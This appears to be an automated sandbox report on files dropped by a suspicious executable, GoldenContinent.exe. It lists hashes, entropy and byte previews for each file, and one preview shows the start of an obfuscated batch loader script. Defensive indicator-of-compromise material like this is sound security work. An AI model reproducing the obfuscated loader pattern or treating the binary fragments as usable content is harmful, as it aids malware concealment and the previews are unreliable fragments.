                                                                                                                                                                                                                                                                          Preview:.;.....X@.[.&.....SJA...D.NNx..Ry..u....s....uzZ.DK0".........r.z..B.E..'..;....N.G.Lm..1........n]....A...<...d.F.]....f.............%...%1."Q.. QM....`B.....gK..P.!.....~z...N.D...._...^.....l.7.'.T=.8...81..>F\.\.........}].f.j2U...H.x.........4w....l.t.j..kV.......~...)..PS..AvU..E.]....0~........*.m+...}a....|..ax'.\.-.....!.g....6..'..Z}f../..C.........XUe..I...{N.Jo....,....H.$.c.......%P\.h..R.y2...d_.7.....{...!.....9l..M...'..1a..m.+g.=i.......w.t.}_..3.....vZ..9.Y`Em.at_....g..WNa.8-..%.m...?<.ScrC...u.....0..HxY.;h1...2xs7._..J.+.z..4..*...cA.Q....6...-R.6t=.....@...B........r.zB..2.y.!|....i.X.t.....+...?.G.nI.N..E.c|70...f.2..z..F..>.......:.....4.X........m...Tv.JUS.[.&..4R...G...u.....c......hB.+C+6.O.Y_|...C+.vT7..y....z.V............4K.................=..j.8......]_/-.L%b.7...I......6XS...ksyP._.y.L..p.(r\.<..RP..`7.]:.w..l-.iF<U...o...t..\A.}.#A.zX/.t..!./.b....]7......T.|z#.....z4Y`Htl-... M....CB.!6.'..L...{...H....O.....#...
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):68608
                                                                                                                                                                                                                                                                          Entropy (8bit):7.997396975796028
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:x4lXXDoPbyD0gPw3Zg4QzK2pJ+x6LpzfPz29ozw5ARgeX:6zoPbyQP3Zg4QzKq7b22GACeX
                                                                                                                                                                                                                                                                          MD5:8F4DECD2A4D2D05FFDDB7C403561F346
                                                                                                                                                                                                                                                                          SHA1:385CA964D82C77F9624C165C73503F1B7E412155
                                                                                                                                                                                                                                                                          SHA-256:391D54BEF0B972CF5B3BF134E6C29867A3D30D373679BF06459205DC93FEB385
                                                                                                                                                                                                                                                                          SHA-512:26F012C839A091523A1884619EF14BB32EFACFB0343810A2618F4DBD358083A574900A121C835874D812212A56618753C9AABEDF146EF222E455D51B0583D573
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:|1.[...-..."..%yb~.B....vA...=..@&.e.v.....3.s..i......`=+....Y..R......e....U.-[BN*.v9....... x...D.M.....p.Z+...Z8[........no...n.?.2..9.j...N,...;R.!f..........$..}.....s..Jv.QR..R.L.F.|.......*.X...H.....k}^.l.sb...}m..r.*.."HK...d.. F.g:.L9..;.r9R{.2'....H.#1S.'.X..g.2x.9..o.......<.3*k\.....I..........B.U4.I..8..9.s$~%.y..lRV.Z}.~7zW....6.R...!..*.....KT$.J.Y~.l..Jo.]....&%..1.J0.l.p.+h.L.....C......gh..%/rK.*.M..(f.d...A.....m.Z.rc.:.......3...M.z..K.`%...."...f...#y.}....(B...R.].&...pQ.`...uD1...../...kX8.b.s`Pu_R|.'........8.[-M.l.......w?....ml>D.......H=U^VF.i..?../QK?.$..T....T@.j.W|}.t|..\....-............>......0...'..d..........~.....j/...E.f*.....|3R..FM...'.I...:^Qn..YL.........j....#.o...4.h....o*....F..m.(5..W..N:p.n.<..........w.J]9.1....C8.5..W.T....m.D....B^...7.=.Sgz.D..QL.'M."w..n.].5..^W.".X......(.....f..eo;.[..h.w.c.......^2.".....h..tZ..3*.`:..c....81q.#2....'.w.O.B..,7.....+@N..M./m]~7.<..X......tHP......%:..
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):81920
                                                                                                                                                                                                                                                                          Entropy (8bit):6.577303594110941
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:mjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubb1/Dde6Yu:Qv18mLthfhnueoMmOqDoioO5bLezW9Fy
                                                                                                                                                                                                                                                                          MD5:850E2F7751488B7087A56A61AE9BEF77
                                                                                                                                                                                                                                                                          SHA1:A45E63501B937BD51456A9EF9E603408F6D118F9
                                                                                                                                                                                                                                                                          SHA-256:49C3959766700E0B397F4BB14244D9CC4FB507C8BB81B6CC0F26CDC2D86F1667
                                                                                                                                                                                                                                                                          SHA-512:DC1053C1EB545D9E44E4DC26444177A6E88DF242CD689B5A367E6F056B2BF8703C7C5FDCFE940AC815480E9BBFA5BD03B306143933BBC64176E015E1090E7B38
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.U..}..V..u.QQ......g.u...S..Y.N..F......~7.B.j........Y.......F..F....u.j.X........P.F..'...Y....P...2....F.@P.u..6. ......^]...U..VW.}.....Q..A...t..B...t..P.;.u...;N.u..V.Q.e....'..N._^]...U..QQSW....3.E.QQ.x.QQGW.0QQ....I..E...u........3VP....Y3...E.QQ.u.VW.0QQ....I.HPQV...(...V.h...Y^_[..U..E.Pj..u..u..u..8......p....Q.wR.......y....].U..E..@....y..u....I.....u.V.u....&....&..F.....^3.]...U......DS.].V...W.t$......3.3.G..P.{..D$...p.I.;.u...t.I..D$ P..l.I..]..d$(..d$,.j.Xf.D$ .C......................tq.....j....C..p....O...F....D$..C..p....O...F....E..@..p.....O...F..8.E..@..0...kO...u..t$.S.F..L$.W.0..........C..H..L$..u.................~6.C........H.....;..!.C..H......L$........D.....D$....d$..j<.x....S.Yj).D$ .r.....u....t.3.....N...F..S.....2...N...t$..F..L$ S.0..:...D$(.@...x&.M..D$ P.l....d$H..L$@P.O...j.3.^......d$8.3..|$<j.......^N...L$..A....E..@..p....EN...F..8.E..@..0...1N...u..F.j.S.\$...W.0.d........C..p.....N...F..8.C..0....M...u.j.j.....j<.o...Y.
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):51042
                                                                                                                                                                                                                                                                          Entropy (8bit):6.930689497243187
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:J+9BGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:J+9BGmdATGODv7xvTphAiPChgZ2kOE6
                                                                                                                                                                                                                                                                          MD5:FD222D640240E593C8281B3215992584
                                                                                                                                                                                                                                                                          SHA1:859F45468121EF32E0140677AA29AD637013B92B
                                                                                                                                                                                                                                                                          SHA-256:E0F37347ED8B26155463BFCF98ABC04DDF1F582C33012EBA1DCA1BAECAAB122C
                                                                                                                                                                                                                                                                          SHA-512:396A8D613E14E75DD3E760980F039071F5BCD3FEF17E3868377A5581BC507F6C27DD438D5ADA3520C8B668D37E86DF74F16DFBA52ACAD68A0A758CAD9C1F2255
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.........Q.............................e...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...d...............................Q...............................................f.................................^...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...^...................................f.......................................................g.....................................b...]...]...]...]...]...]...]...]...]...]...]...]...b.......................................g...............................................................Q............................................p...`...]...]...]...]...`...p..............................................R.......................................................................'...................................................................................................................(...................................................................................t......
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:Targa image data - RLE 8 x 8 x 8 +8 +8 "\010"
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):152576
                                                                                                                                                                                                                                                                          Entropy (8bit):5.31114009413781
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:YKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo:e6whxjgarB/5elDWy4Z
                                                                                                                                                                                                                                                                          MD5:2750CEAB03BDA7EC977660E2E5ED1378
                                                                                                                                                                                                                                                                          SHA1:F28A4057F2580AF4C97ECC4E4FCFDCE9D86918DB
                                                                                                                                                                                                                                                                          SHA-256:0226268D6FE7BBF21B21C2A3A117D26F949526F68FAA425D1D03B6689436EE43
                                                                                                                                                                                                                                                                          SHA-512:782722385D5ECA881C366DF968126D6B49601B470E9AB2A3F762053B7910520E8982DFEDECC98F764E8F9F10F8E45B5B542B11D9F6477949EF97DF2449BE5DC3
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................r.r.r.r.r...............................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.......................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...............................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1428), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):30129
                                                                                                                                                                                                                                                                          Entropy (8bit):5.0912603741502345
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:PyCCN7AUkSj4PAO0qvRm4sJtubk8l9wTNnUrKJLwioJhG:zFAOxvN0tw9l9wThUOJLwioJg
                                                                                                                                                                                                                                                                          MD5:AF14F57478CFDFECF403381BD9E816D0
                                                                                                                                                                                                                                                                          SHA1:652001844758EF461A0FAC5A1BA9097B0291D473
                                                                                                                                                                                                                                                                          SHA-256:F18F8E672DC1F8EBBEE1294CC79CEEA9C03C90E39101868CACFCC6B2648610BC
                                                                                                                                                                                                                                                                          SHA-512:B0879B3B25B2B75EA31438B1C9FECD2972D4F39E6B90CB8C3338EA395DB54F01D9DB7B4FB1B57FFD230A8F9A1562F057679DB2927CEE90BB8D6E0087B9DE7375
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:Set Decreased=P..gHIntroduced-Hb-Featuring-Meets-Albums-..BSSegment-Duncan-..NebVHappy-Implement-Boundaries-Unsigned-Refer-Pal-Appreciate-Engagement-Exemption-..bBAffected-..XpvBoxed-Regulations-Males-Businesses-Unable-Speech-..xNAware-Aim-Compromise-..Set Israel=r..qGUrRegional-..lhzSeat-Motherboard-Otherwise-Wax-..RgADependence-Intervals-Fiber-Document-Over-Terrible-Experiments-Arrangements-Persistent-..yFHServices-Fighter-Party-Incurred-Advisors-Dts-..oiHGenetics-Possibly-Tissue-..WYyLimited-Oracle-Med-Download-October-Immediate-Complexity-Heating-Millions-..SgMVerde-Solo-..Set Slight=I..SdDUnnecessary-..WBRaising-Tickets-Lincoln-Recorded-Referenced-Incidents-Chairs-..AyHolland-..FegOHoldings-Corrected-Salary-Pounds-Crimes-Many-Numerical-Cattle-Demonstrate-..utGuests-..plplLady-Committed-Biggest-Burden-Psychology-Products-Pollution-Blvd-Beastality-..BNohEthical-Yeah-Andorra-Posted-Went-..ElVolume-Hiv-Allows-Pearl-Payment-Newark-Gonna-Tagged-B-..cjuILite-Sum-Leg-Asks-Linda-Perhaps-Ga
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1428), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):30129
                                                                                                                                                                                                                                                                          Entropy (8bit):5.0912603741502345
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:PyCCN7AUkSj4PAO0qvRm4sJtubk8l9wTNnUrKJLwioJhG:zFAOxvN0tw9l9wThUOJLwioJg
                                                                                                                                                                                                                                                                          MD5:AF14F57478CFDFECF403381BD9E816D0
                                                                                                                                                                                                                                                                          SHA1:652001844758EF461A0FAC5A1BA9097B0291D473
                                                                                                                                                                                                                                                                          SHA-256:F18F8E672DC1F8EBBEE1294CC79CEEA9C03C90E39101868CACFCC6B2648610BC
                                                                                                                                                                                                                                                                          SHA-512:B0879B3B25B2B75EA31438B1C9FECD2972D4F39E6B90CB8C3338EA395DB54F01D9DB7B4FB1B57FFD230A8F9A1562F057679DB2927CEE90BB8D6E0087B9DE7375
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:Set Decreased=P..gHIntroduced-Hb-Featuring-Meets-Albums-..BSSegment-Duncan-..NebVHappy-Implement-Boundaries-Unsigned-Refer-Pal-Appreciate-Engagement-Exemption-..bBAffected-..XpvBoxed-Regulations-Males-Businesses-Unable-Speech-..xNAware-Aim-Compromise-..Set Israel=r..qGUrRegional-..lhzSeat-Motherboard-Otherwise-Wax-..RgADependence-Intervals-Fiber-Document-Over-Terrible-Experiments-Arrangements-Persistent-..yFHServices-Fighter-Party-Incurred-Advisors-Dts-..oiHGenetics-Possibly-Tissue-..WYyLimited-Oracle-Med-Download-October-Immediate-Complexity-Heating-Millions-..SgMVerde-Solo-..Set Slight=I..SdDUnnecessary-..WBRaising-Tickets-Lincoln-Recorded-Referenced-Incidents-Chairs-..AyHolland-..FegOHoldings-Corrected-Salary-Pounds-Crimes-Many-Numerical-Cattle-Demonstrate-..utGuests-..plplLady-Committed-Biggest-Burden-Psychology-Products-Pollution-Blvd-Beastality-..BNohEthical-Yeah-Andorra-Posted-Went-..ElVolume-Hiv-Allows-Pearl-Payment-Newark-Gonna-Tagged-B-..cjuILite-Sum-Leg-Asks-Linda-Perhaps-Ga
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):61440
                                                                                                                                                                                                                                                                          Entropy (8bit):7.996521386092723
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:toQS4kBhUH0wmadkZgU3Q+q4uc7X3sZepMTXHTAC83Nd2cIH:OdhaLmaggUXq4fX7qXH3U2cIH
                                                                                                                                                                                                                                                                          MD5:B6DF230011AF1D7F8415B0B5969C2F4A
                                                                                                                                                                                                                                                                          SHA1:48ED82745E2FDEB446FCC0B81ADD5A4530EDDFD7
                                                                                                                                                                                                                                                                          SHA-256:141ACB51A175B6E2ACEC3455B4D7EAB19779E11DDA14A5D4E82A63C7A2F817C7
                                                                                                                                                                                                                                                                          SHA-512:5999389BCB4993A2A4E5745D6A5005345C58FCED90B9D93EB5FD3E71D6987E858B2F47BCAC1BA7876C93B06D1A5F4BE7C6FDC85F03264711E0C99D229317CFA8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.#..A........:. &...s).>e.....[.=.'..P1X..aK..V=..e.w......).....Y...`?.{V...r/.ph5.Y.rk......l.|..t..AuE..S.TEk.....Pi..FoG.Qf.8.B1.)...{.S......kE.,.Z....i.I..G5.....$m..w.N%..{..K#..T<.'>n.....nl...V=....X...u.........q.t.ga.....G...rt,..x...r..]..pf..+...9..w.+...ZZ..;n..m.5l'l.N.f.c(..?....H.tN.a..h.}W.:lu.....7.5.O........n.}(m.Gi.WF..fafZ.........W+..,....(CWN..Jx......d."Qz$Q..bcp.....2u^.>...8...Y.1.2...k..ex....j....!^.cX.P.3..:0..a#.....ML..r...Y .V..Q......e....~1..R.B.Od}.KZ.&.".....u..X....&Z...=.........0..9....g..A.,...U...s+..."..^./cmqIwTU..s..w...E.$}&...!$#.J..J.m.......a.rf.e...T ..#UP.w.?.b..M......2.?..-/y.T..c(K........L.M...~Lum..........{a~y..YI...\/'.... .......d.UZ...Q.k..27.X.B..3AB......H.....(A|...o.~.k.#C.....NzJ..... ..+.G...SN=.S.].....<vY%.|....2..0.C0.6[[C...h~w....i.7..Q/......=..Y.u.c.:S~.6!Q....3tn.....N..-C=..^.~+.u..H..bx...[.E4T... .......0..F./.....B..W......(!.Y.."Z.^X=..M:..%... ....]..]....U.
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):124928
                                                                                                                                                                                                                                                                          Entropy (8bit):6.005713786418481
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:W640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtsPo:t4V14ZgP0JaAOz04phdyA
                                                                                                                                                                                                                                                                          MD5:7CDF29F1AD43ED80FD3BF9F2BCF8E448
                                                                                                                                                                                                                                                                          SHA1:BC126782FC727C0EFD0CA2F03ED7106ADE3D4FA9
                                                                                                                                                                                                                                                                          SHA-256:6753E389E6C641FFC5F06EE46B9DD7D65201A77BC687E5F584B26EA56FBF5748
                                                                                                                                                                                                                                                                          SHA-512:47ED86EAAADB8A121653A2C8415B6099F8AC88B588065674AFA3BAC96EEE6C70C026FC1C74AA4A014BF539A8E243F7EB5CAD94226926FBB3A5D5BE5E46BC72BF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.u....j.j.j..7..H.I.3.j.Z.p............Q.X...YVP.7.D$(..t.I.S.D$4Pj..t$(.t$...(.I..|$$.t@.t$..|$0j......D$4.D$8....I.P.t$...,.I.S.\$..D$4Pj..t$(S..(.I....\$..|$..tE.t$..|$0j.......(.I....D$0VPS..,.I.V....I.j.j..D$8P.. .I..D$0PS..$.I..t$....Y.t$(S.. .I..t$.....I..t$ S..,.I..t$,S....I.3.@_^[..].....U...<.E.SVW.p...X.....=..I.....M..u.t.j....E..@L...u.j...PS..,.I..E..E..@H...u.j...0.I.j..E.....P..(.I..E..E..@H.E..t.j.......<t.Pj.j.....I..5 .I.PS.E....u.E.S....I..u..E.S..E.}.E.......E.j.j..E.P..... .I.j.j..u..u..u..u.S....I..}.j..7..\.I..............#.. .......u.;.u.....u.j.Y.....t..........u.....u.j.j.j..7..H.I.3.j.Z.x............Q.....YWP.E.E..0..t.I..}..t&.u.}.j.j..E.P..... .I..E.PS..$.I..u..}..t.j.....I.PS..,.I.V.u.E.Pj.VS..(.I.V....= .I.Y.u.S...u..5..I....u.S...u....u.S..,.I..u.S....I._3.^@[....U..].....U....VW.}..E.PW....I..u..E.+E.+u....)M.;E.|>;E..9..)M.;E.|/;E..*;5.)M.."W..P.I...t.W....I...t..=|)M..5.)M.3._@^....U... SVW.E....P.E...u...@)M.......0....I..D)M
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):105472
                                                                                                                                                                                                                                                                          Entropy (8bit):6.723955878673787
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:ReOypvcLSDOSpZ+Sh+I+FrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1Cwt:ReOyKODOSpQSAU4CE0Imbi806
                                                                                                                                                                                                                                                                          MD5:093E44E1DAAA29E32F2711283167AD8B
                                                                                                                                                                                                                                                                          SHA1:3BE29AAD7A16048F09D3A190EECB2567BE10C838
                                                                                                                                                                                                                                                                          SHA-256:E6C6CC8B34F76878305C6BDB16DCD61A99EFDD1B3BCD25BFAAF5C6F585D79843
                                                                                                                                                                                                                                                                          SHA-512:4F642E0ACA001D1BE656408C20E6F00F00C59F5B966B4894DC01793DCB0EDE0CD38099C990420D7238F14A0202C1A8213136D740FB22A74688CFCF379BFC6385
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:..$j.j..........7WV.|....E....'WV.n....E....E.%.....E..E.WV.E..Q....E.YY_^..].............=0#M.............\$..D$.%....=....u..<$f..$f...f....d$.uZ......=0#M..t2.....\$..D$.%....=....u..<$f..$f...f....d$.u..u..........$.T$..D$..........T$........P..<$f.<$..t............T$...................................L$.....R.............u....=.!M...........#J.......D....=.!M..........#J..........Z.T$..x.......z.t.A.1........u.......Z...Z.3...3.%.....D$.u.T$..<....D$...%..........=....u..T$.u...u...t..Q.....$.\$...q.......Y.a.....t....F.........C....D$.%.....D$.........D$.%.....D$.t=.f....l$.....D$.....t..-`>J...t........................................................-.>J.....................u....#J............u........U..QQV.u...u..\..........dC..3..W.}..u..e...E..e..SP.N...M..E.....>.j.h........PQ..9...].[...|...=.o@.w.k.d..3..V.@.N.^..]..U....3.W.}.j.....E.P.d...YY_...t.........U.E..M...t....Q...].j.hH.L...$..3..u........u............B..3..s3..}........t.3.3.f9..
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):145408
                                                                                                                                                                                                                                                                          Entropy (8bit):6.6245809119795265
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:yPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypI8:yPj0nEo3tb2j6AUkB0CThp6vmVnU
                                                                                                                                                                                                                                                                          MD5:6CC42A5BCA76F09BF28289009427AFF5
                                                                                                                                                                                                                                                                          SHA1:9B4B6DD644CF82B80A025B4DEDABD8406F9B3B31
                                                                                                                                                                                                                                                                          SHA-256:CACABEB6D49CA732CF5532FF4918EEA4DADF67DEC277C42D37BBA32BBF2986E3
                                                                                                                                                                                                                                                                          SHA-512:846BF07F4F0ED2563C8A2EF96FA9EFD493ED54D07D49A36D0BA1EBEE16865346BF8AB3C819FF86A3C27DB023037515CF5374BDDF7FB80636390DD1BAD3495534
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.Pj.j...\.I.....t;.u..e...M..y....M..#..PQ.M..,#..YP.F.P.\.......M..a.......3.^....U..V..W.f...~..f.......EL..F..........;}.t..u....Z..._.F.......^]...U..V..f...N..f.....EL..F..........E..F....F.....^]...U..V..f...N....EL..F........j..`...Y.u.........F....F.....^]...U..V..f...N....EL..F......M...j......Y.u....i....F....F.....^]...V.......j.V.....YY..^...V..N....EL...t.Q......N...t...j....N......j(V....YY..^...U..E....P..D.I.]...U..M...t-.}..u'.}..u!.E..x..u.j.Zf...@..@.H...@.A.3.....@..]...U..V.u...tU.}..uO.}..uI.}..uC.M......f..f.A.f...A....t....t....t..A....q...h.I....A....A..F.3....W...^]...U..E...t.. .3....W...]...U..j.hD.J..u..~........t.j.ht.J..u..h........t...@....V.u.V...P..E..03.^]...U..V.u..F.P..@.I...u...t.Q......3.^]...U..V.u.W...6..;.t....t...V.P....7...t...Q.P..._^]...U..QQ..u.hW..........e..VWj.^.}.WRQ.P8...E.y...........P.Q..z.e...U...RP.Q..U...xJ..tT.B(...t...u:..J@f;.u..R<.M......U.........t....t....t.....j...j...j.^..t..E.RP...QL.M...t...Q.R._f..^..U
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):117760
                                                                                                                                                                                                                                                                          Entropy (8bit):6.41749450367767
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:DdgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+3m:JgQaE/loUDtf0accB3gBm2
                                                                                                                                                                                                                                                                          MD5:BFCC32C058927FD6F1DC7D49432245B6
                                                                                                                                                                                                                                                                          SHA1:37FD77F925A236217709A62634FB91507C1CE1AD
                                                                                                                                                                                                                                                                          SHA-256:92D6B2C91AE61AD4EB755F32DAB99833F2C0D46BC43144DFA78F79FDE79814B6
                                                                                                                                                                                                                                                                          SHA-512:D24883BB0A214E8E8713A0F08A3E95A80BF3A30AB67B81BCED538F810AAD24A04FD3F858FDC1CD0099770E326B7274A28C0D7AAADB07245B4D3E343A97AF1466
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:_..^]...j..F.........7.~..._..^]...j..+.........7...._..^]...j............7.Z..._..^]......A..dE...A...A...A...A...A..eE...A...A.UeE..eE..eE..eE.4.A.....U..U...T....R.S.].VW.....4...F.f..Ntx.].f..5...Q..f..G...Q...u.;.t5.F......%S...N.....=S.......IS..S...F........................vS...........iS..3._^[..]....E..@.......P...E........E......E......D...E.......@..E.A.......j...@..E..E.PV.u.........SO...U...........].......N...E....@..E....f.x.O..HN...A.............E...........E.C.].P....f.x.N..r....E..x.....K......3............~6.E..........2........@}........................E.A;.|.j.j.R.K............K...M......L...E.......L...u.;........F.......N...N......N.......P.....O...B.......J...$.D.A..E......u.f.90tCQ.oJ...].....U......B....wU.$.l.A..E......u.f.90t'Q.<J.............Q...x...I....Xu...I....Q...x..@J....Xu..6J..3.......A.#fE...A.kfE.kfE...A.kfE.kfE.6fE.AfE...A..fE...A.=.A.=.A...A.=.A..fE..fE..fE.............U..SV.u.W...................]..u......R.....E..X......R.......
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):78848
                                                                                                                                                                                                                                                                          Entropy (8bit):7.997677582381979
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:caO1cfSGzPlYz5XiSpYBe5IAtY7yKTAZaNMJr7Gq7nuYyVt:FOaJzPlYtSSpGeKf+9ZLJrViYyVt
                                                                                                                                                                                                                                                                          MD5:A41ADC03A819C861EB3371C8DF26FE8B
                                                                                                                                                                                                                                                                          SHA1:188DD98EBB43308A18B8CC7946B6117EEE295B38
                                                                                                                                                                                                                                                                          SHA-256:166243C65693A04D65270F05C6D3636EA99CC84B47B479714C18D5B5BFB22CBB
                                                                                                                                                                                                                                                                          SHA-512:2F8CEC765DE46A607283E4F9DA77AA1D9F59FE8840013A69FD9007457ECDA48447DB06A01A9084C53E8C185501F6FA54C4CD80148002A3D4F8394A374D7B0DD4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.3xh.<.$.X}.P|.-...29.e.THS.X.(I$..8.y....m...7X.U....wyo.5.N.pK.X...........D.....[.2.Y....4....sb...C.^X.>.4Rwt96.\ 8.y+.`./.....P .Z......<.W...(.VV8Y...2!.u\ .. .<Pf.fQ.."8j4k..l......."....FmZB.\~...mx.[..........j:..dX...K...........I+..al..)..j.......2.|W...p..fH.._...&J..g.L..:.bl.$...m....=';..tT..y\......<.h..;...jkM....^i..Q...-..`Z.....e..y..a.L.k.#..T.5.....0.B[.#.|)..0b..!....v.......K...&....8..r.1.w.. ?7..N+O..y"..tZ...D...;...P..v..rg(G.p.....k..+.U.7.......zT...f\u.l......-.....f......n...}.n.A ....:.2V......;.~.SS.-.'...+........'u....y...D.f..r..W...E....w.Z..=.y.v.....'/~.b..B.t"..I..;^...o."q..j....a..S......A..C.P..I..E.}.'..8.....Ih:.M..:..-.F.-...Qik.Ym6..Z.G.1....oB Bx..!D.Up.*.t..V..`.}......X..L.....P.2.r-.........eM..2....J.IvY.Esp.;...,......=..g28.C.s..9...]i..{..C..}...:eY..@u_.....FFX.....b....^.....H..k|-e...0..../*e.Ls_G.FXq,......^....-6.w.-F...b).L...7cK.N/.m..S....iE5.@.....2t..]S.p.Bz...s..d).2.
                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (6186)
                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                          Size (bytes):6192
                                                                                                                                                                                                                                                                          Entropy (8bit):5.809020948542197
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:LsM3XN6666VACcpb7ybvg4N79Fd66666rJ3FBzlDMDBAQ9Z:LsM3966662Vybvg4T66666lVBed1z
                                                                                                                                                                                                                                                                          MD5:29BA7AE7C03ED725C47722C5DA382E55
                                                                                                                                                                                                                                                                          SHA1:6CE2A589BE22983FA3966CF152243A5C38355867
                                                                                                                                                                                                                                                                          SHA-256:75AD7C4A8C73E5F1DC14AB472CACCE5F1C09C8D906F8ED3A3A1238317786BED8
                                                                                                                                                                                                                                                                          SHA-512:16BB17527FFE0D72DC984CC1EA7292FAEF12A50582D51E80B9EBAEEF38311E2D1D444D14A599A5B977DD68965370798A222A16AFEF7DD3323A1D1DF82C8C26B8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
